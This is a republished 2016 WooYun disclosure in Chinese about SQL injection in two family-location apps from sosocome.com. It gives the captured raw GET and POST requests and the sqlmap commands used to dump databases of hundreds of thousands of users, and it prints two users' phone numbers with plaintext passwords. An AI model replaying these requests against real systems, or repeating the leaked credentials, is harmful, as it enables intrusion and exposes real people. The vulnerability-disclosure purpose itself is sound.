云上家人安心定位两个app注入漏洞(用户数据50w+)

admin 2017年3月23日06:10:31评论315 views字数 229阅读0分45秒阅读模式
摘要

2016-03-19: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-05-03: 厂商已经主动忽略漏洞,细节向公众公开

漏洞概要 关注数(1) 关注此漏洞

缺陷编号: WooYun-2016-186594

漏洞标题: 云上家人安心定位两个app注入漏洞(用户数据50w+)

相关厂商: 云上家人安心定位

漏洞作者: Zhishufu

提交时间: 2016-03-19 19:33

公开时间: 2016-05-03 19:33

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 12

漏洞状态: 未联系到厂商或者厂商积极忽略

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 注射技巧

0人收藏


漏洞详情

披露状态:

2016-03-19: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-05-03: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

云上家人安心定位旗下两个app注入漏洞,一个app的数据45w多,另外一个6w手机号的样子...

详细说明:

code 区域
http://www.cn-sec.com/drops//tips/749

最近在乌云知识库看到的文章,打算看看手机APP漏洞咋挖,于是就拿起手机...

云上家人安心定位两个APP,以前用过的软件...

官网

code 区域
http://www.sosocome.com/

云上家人安心定位两个app注入漏洞(用户数据50w+)

第一步当然是在官网下载两个APP到手机上,然后安装...

code 区域
下载地址1:http://www.pgyer.com/uMWn
下载地址2:http://www.pgyer.com/ZAjT

手机端设置好代理,然后用burp抓包。

云上家人安心定位两个app注入漏洞(用户数据50w+)

云上家人安心定位两个app注入漏洞(用户数据50w+)

云上家人安心定位两个app注入漏洞(用户数据50w+)

抓包数据分别为

1.

code 区域
GET /jsp/userIsExist.jsp?phoneNum=12345678901 HTTP/1.1
Host: www.sosocome.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0(Linux;U;Android 2.2.1;en-us;Nexus One Build.FRG83) AppleWebKit/553.1(KHTML,like Gecko) Version/4.0 Mobile Safari/533.1
Cookie: BAEID=CC10289F2982ECB4CAA984550AF8933F:FG=1; JSESSIONID=65DE9EA6F7C57F1F23E62543F9D9A809
Cookie2: $Version=1

2.

code 区域
POST /jsp/ios/login.jsp HTTP/1.1
Content-Length: 17
Content-Type: application/x-www-form-urlencoded
Host: w.sosocome.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0(Linux;U;Android 2.2.1;en-us;Nexus One Build.FRG83) AppleWebKit/553.1(KHTML,like Gecko) Version/4.0 Mobile Safari/533.1
Expect: 100-continue
Cookie: BAEID=104726C904CF56BDEF4A7E7C45287724:FG=1; JSESSIONID=F21C0C1644BF8214C903D9BD7535F351
Cookie2: $Version=1

UUID=1&password=2

分别保存为.txt文件然后带到sqlmap里面去跑..

code 区域
sqlmap.py -r 6.txt --dbs
sqlmap.py -r 7.txt --dbs

两个注入方式分别为GET、POST

注入的结果如下:

云上家人安心定位两个app注入漏洞(用户数据50w+)

云上家人安心定位两个app注入漏洞(用户数据50w+)

云上家人安心定位两个app注入漏洞(用户数据50w+)

云上家人安心定位两个app注入漏洞(用户数据50w+)

一个有6w多手机号码,另一个有45w多手机号码,还有明文的密码。因为是定位软件,所以账号上涉及用户的手机号,email,家庭住址等等..

找几个账号用手机登陆下

code 区域
账号1:13752270168 悦悦
密码1:031210
账号2:15832821931 孤狼B组
密码2:15930382462

另外一个6w多手机号

云上家人安心定位两个app注入漏洞(用户数据50w+)

具体结果看漏洞证明。

漏洞证明:

1.

code 区域
GET /jsp/userIsExist.jsp?phoneNum=12345678901 HTTP/1.1
Host: www.sosocome.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0(Linux;U;Android 2.2.1;en-us;Nexus One Build.FRG83) AppleWebKit/553.1(KHTML,like Gecko) Version/4.0 Mobile Safari/533.1
Cookie: BAEID=CC10289F2982ECB4CAA984550AF8933F:FG=1; JSESSIONID=65DE9EA6F7C57F1F23E62543F9D9A809
Cookie2: $Version=1

2.

code 区域
POST /jsp/ios/login.jsp HTTP/1.1
Content-Length: 17
Content-Type: application/x-www-form-urlencoded
Host: w.sosocome.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0(Linux;U;Android 2.2.1;en-us;Nexus One Build.FRG83) AppleWebKit/553.1(KHTML,like Gecko) Version/4.0 Mobile Safari/533.1
Expect: 100-continue
Cookie: BAEID=104726C904CF56BDEF4A7E7C45287724:FG=1; JSESSIONID=F21C0C1644BF8214C903D9BD7535F351
Cookie2: $Version=1

UUID=1&password=2

云上家人安心定位两个app注入漏洞(用户数据50w+)

云上家人安心定位两个app注入漏洞(用户数据50w+)

云上家人安心定位两个app注入漏洞(用户数据50w+)

云上家人安心定位两个app注入漏洞(用户数据50w+)

云上家人安心定位两个app注入漏洞(用户数据50w+)

云上家人安心定位两个app注入漏洞(用户数据50w+)

云上家人安心定位两个app注入漏洞(用户数据50w+)

云上家人安心定位两个app注入漏洞(用户数据50w+)

修复方案:

1.过滤

2.完善用户体系

版权声明:转载请注明来源 Zhishufu@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分


评价

  1. 2016-03-20 20:23 | Zhishufu ( 普通白帽子 | Rank:246 漏洞数:75 | 束缚!)

    1

    估计又是忽略了..

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin